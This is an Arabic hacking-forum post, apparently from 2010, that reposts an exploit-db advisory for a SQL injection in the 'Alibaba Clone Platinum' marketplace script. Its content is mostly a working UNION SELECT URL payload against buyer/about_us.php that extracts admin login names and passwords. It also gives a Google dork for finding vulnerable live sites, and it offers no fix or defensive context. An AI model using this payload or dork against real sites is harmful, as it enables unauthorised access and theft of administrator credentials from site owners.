التواصل المباشر مع الادارة والاعضاء القدامى من خلال قناة التلغرام



العودة   :: vBspiders Professional Network :: > [ ::. الـقرصـنـة والأختراق ~ The Hidden World Of Hackers .:: ] > قـسـم إخـتـراق الـمـواقـع والـسـيرفـرات

 
 
LinkBack أدوات الموضوع انواع عرض الموضوع
قديم 05-16-2010, 02:27 AM   رقم المشاركة : 1 (permalink)
معلومات العضو
 
الصورة الرمزية Dr.NaNo
 

 

 
إحصائية العضو







Dr.NaNo غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 10
Dr.NaNo is on a distinguished road

Talking Alibaba Clone Platinum (about_us.php) SQL Injection Vulnerability


اقتباس
# title: Alibaba Clone Platinum (about_us.php) sql Injection vulnerability
# edb-id: 12612
# cve-id: ()
# osvdb-id: ()
# author: Cobra_21
# published: 2010-05-15
# verified: Yes
# download exploit code
# download n/a

view source
print?
-------------------------------------------------------------------------------------------

alibaba Clone Platinum (about_us.php) sql Injection vulnerability

-------------------------------------------------------------------------------------------

author: Cobra_21

mail: uyku_cu@windowslive.com

script home: http://www.alibabaclone.com/

price: $699 usd

dork: Inurl:buyer/about_us.php?buyerid
-------------------------------------------------------------------------------------------

sql injection:

http://localhost/[path]/buyer/about_us.php?buyerid=-31%20union/**/select%200,1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16, 17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33 ,34,35,36,concat%28loginid,0x3a,password%29,38,39, 40%20from%20admin

-------------------------------------------------------------------------------------------






الإستغلال .:


اقتباس
http://localhost/[path]/buyer/about_us.php?buyerid=-31%20union/**/select%200,1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16, 17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33 ,34,35,36,concat%28loginid,0x3a,password%29,38,39, 40%20from%20admin

الدورك للبحث عن المواقع المصابه في محركات البحث مثل قوقل .:


اقتباس
inurl:buyer/about_us.php?buyerid





Alibaba Clone Platinum (about_us>php) SQL Injection Vulnerability

التوقيع

http://www.vbspiders.com/vb/t61978.html

 

   

رد مع اقتباس
 

مواقع النشر (المفضلة)


تعليمات المشاركة
لا تستطيع إضافة مواضيع جديدة
لا تستطيع الرد على المواضيع
لا تستطيع إرفاق ملفات
لا تستطيع تعديل مشاركاتك

BB code is متاحة
كود [IMG] متاحة
كود HTML معطلة
Trackbacks are متاحة
Pingbacks are متاحة
Refbacks are متاحة

الانتقال السريع


الساعة الآن 02:46 AM


[ vBspiders.Com Network ]

SEO by vBSEO 3.6.0